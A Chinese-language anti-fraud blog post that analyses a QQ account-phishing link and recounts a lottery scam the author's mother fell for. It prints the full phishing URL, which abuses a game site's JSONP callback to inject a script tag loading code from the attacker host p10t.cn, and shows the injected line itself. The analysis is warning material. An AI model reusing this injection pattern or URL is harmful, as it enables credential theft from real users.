前言
相信大家在懵懂無知的時候都有被盜號的經歷吧,QQ胡亂的加好友,突然有個好友傳了個文件給你,打開以后發現QQ竟然顯示強制下線,然后再也上不去了QAQ,很明顯,QQ號被人盜了。最近也是很多小伙伴私信我,也看了一些人發空間說QQ號被盜了啥的,以及我自己收到的一些詐騙請求。網上針對防騙這塊的文章幾乎沒有,為了不讓更多的人受害,下面我將會以最真實朴素的語言介紹最常見的一種盜號詐騙方式,淺析一下這個盜號原理的全過程~~~希望大家不要再上當受騙啦~!
正文
下面我給大家介紹一種最常見的QQ詐騙方式。
這個是我今早收到的一條鏈接,相信不少朋友肯定也收到類似的鏈接吧,甚至乎很多人都說因為點開這個鏈接被盜號吧。。。只有不懂安全,沒用安全意識的人才會這么說吧!!!
讓我帶大家來剖析一下這個東東吧~~~
很明顯,你看這個域名看不出任何眉頭,既然大家都不敢點,我就替大家點點看~~~
首先我們在手機端點開這個鏈接
點開一看,我們可以看到,是一個QQ空間登錄界面,這個界面就是一個欺騙用戶的界面,為什么這么說呢,你把這個界面鏈接復制出來,用瀏覽器打開,你會發現網頁無法打開,並且域名成了下面這個:
http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png
看樣子域名被瀏覽器解析成了一張png圖片,你可能會有點好奇這個,我們用pc端按照這個地址進行追蹤,用F12查看網頁源代碼
<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})
就只有這么一行,我們可以看到從登錄頁面輸入完賬號密碼以后會跳轉到一個app.php網頁里面,我們循規蹈矩,直接去追蹤訪問那個界面
有點意思,網頁從QQ空間進行跳轉的
window.location.href = "http://qzone.qq.com";
學過JavaScript的朋友應該知道,location.href="網站鏈接",表示重新定向到新頁面,同時刷新打開的這個頁面;
這個意思是從一個偽QQ空間的頁面上輸入賬戶密碼,這個頁面被植入了php的惡意木馬,通過跳轉重定向,直接跳轉到了木馬網站去了,后台數據庫並記錄了這條信息,然后你的QQ號賬戶密碼就被別人成功獲取了~~~
如果不信的話,我們可以一起來試一試
首先輸入賬號密碼。。。我們就隨便偽造一個,賬號是3838438,密碼就寫一個mmpsbsbsb試試看!!!
這里還要說一點,我試的時候這里好像做的還挺真實的,防中文輸入,我本來想直接開口大罵呢,hhhh,沒給我這個機會。。。
這里無論輸入什么賬號密碼都可以過,除了中文無法檢測,賬號必須是一連串的數字,密碼防了中文輸入。
然后我點擊登錄
看吧,直接就登錄成功了,還有這張圖片,這這這。。。完全就是挑釁啊,竟然貼一張小狗的圖片,是在考驗我智商嘛?
我嘗試了一下ping它的主頁,ping p10t.cn
ping通了,說明這個網站還活着。
但是登錄頁面顯示403錯誤,服務器拒絕訪問,我不是很清楚如何繞過這一防線。
那我也沒轍了,技術不夠精湛,我只能寫下這篇文章記錄一下,希望更多的人看到,不要再上當受騙了就好~~~
如果文章哪里寫的有出路的地方,希望各位不吝賜教,如果有更好的解決方案,歡迎在評論區留言或私信給我,感謝大家的支持~~~
關於其他類型的詐騙
可能有些人遇到一些其他的詐騙,比如電話詐騙,短信詐騙,講一個最真實的例子,推薦你們看一部電影,叫嘉年華,里面講述的是關於電信詐騙的案件,這部電影是由真實事件改編而成的,非常推薦大家觀看,里面有一些防詐騙的技巧,看完以后你會對常見的詐騙手段有了一個更深層次的了解。
如果沒有找到資源的小伙伴,我也會在文章中分享給你們一個百度雲鏈接,保存以后下載觀看即可:鏈接:https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密碼:2qlz
說這么多,可能大家會認為我在吹牛皮,認為這些事情不會發生在自己身上。我講一個最真實的例子,我母親因為前段時間地上見到一張彩票,刮開獎說中了10w塊錢,我身在一個並不寬裕的家庭,按照現在的話來講,算是貧農家庭,還遠沒達到小康水平,想想看,10w塊錢從天而降,對於我們這種家庭,這絕對算是一筆相當的財富,當時我媽拿着彩票回家,和我還有我爸商量來着,我一看說,這肯定是騙局吧,這么好的事情為什么偏偏出現在我們身上,天上不會掉餡餅,努力奮斗才能夢想成真,我媽偏不信這個邪,想去試一試,然后撥打了上面的電話,上面巴拉巴拉說了一大堆,意思就是要交3000塊錢稅錢啥的,然后才能兌換這個錢,你看,這不明顯是騙局嘛,我媽又覺得,如果得到了這個錢,相當於她少上多少年的班,其實說白了這一切都是為了這個不爭氣的我,我其實也是很愧疚的。所以朋友們要記住,只要談到錢這個問題,要悠着點,十有八九都是騙局,我媽最后是按照地址打錢過去了,然后事實上,對方並沒有想要兌換的意思,巴拉巴拉說了一大堆,好像又是要交錢。。。我媽現在才意識到被騙了,然后跑到警局報了案,警方說,你不是第一個了,關於彩票中獎被騙的人一大堆,他們說沒有足夠的證據線索,立不了案,沒辦法了,3k被狗吃了,這可是辛辛苦苦東奔西跑的血汗錢,這些騙子也是一點良心都沒有,所以。。。后來我勵志要當一名網警,要把這些逍遙法外的人繩之以法,天網恢恢疏而不漏,這些人最終一定逃不了法律的制裁的。
后記
關於盜號這一問題,我給大家提醒兩句,只要少一點好奇心,少一點貪欲,多一點警惕之心,不管是什么類型的詐騙都不會出現在你身上,謹記哦。。。